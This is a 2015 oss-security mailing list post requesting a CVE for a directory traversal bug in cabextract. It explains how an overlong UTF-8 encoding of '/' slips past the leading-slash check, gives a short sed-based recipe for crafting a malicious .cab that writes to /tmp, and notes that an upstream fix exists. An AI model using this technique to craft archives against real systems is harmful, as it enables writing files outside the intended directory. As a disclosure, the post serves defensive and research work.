Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 18 Feb 2015 13:11:55 +0300
From: Alexander Cherepanov <ch3root@...nwall.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request: cabextract -- directory traversal

Hi!

cabextract is susceptible to a directory traversal vulnerability. While 
extracting files from an archive, it removes leading slashes from 
filenames but does it before possibly decoding UTF-8 and doesn't check 
for invalid UTF-8. Hence an absolute filename can be shoved through by 
using overlong encoding for the leading slash (and setting utf8 
attribute in the header). This can be exploited by a malicious archive 
to write files outside the current directory.

Illustration:

$ touch xxxxxxxxxx
$ lcab xxxxxxxxxx test.cab
$ sed -i 's|\x20\x00xxxxxxxxxx|\xa0\x00\xe0\x80\xaftmp/abs|g' test.cab
$ rm xxxxxxxxxx

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ ./cabextract test.cab
Extracting cabinet: test.cab
   extracting /tmp/abs

All done, no errors.

$ ls /tmp/abs
/tmp/abs

In the sed command above, \xe0\x80\xaf is an overlong encoding for '/', 
\xa0\x00 are flags updated to include utf-8 flag.

The issue was found in cabextract 1.4 and 2-byte encoding (\xc0\xaf) was 
enough to hide '/'. cabextract 1.5 tightened utf-8 checks and 3-byte 
encoding is now necessary.

The issue was reported to Stuart Caie today and fixed in less than 4h:

http://sourceforge.net/p/libmspack/code/217/

Another release of cabextract is expected in the next few days.

Could CVE please be assigned?

-- 
Alexander Cherepanov

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ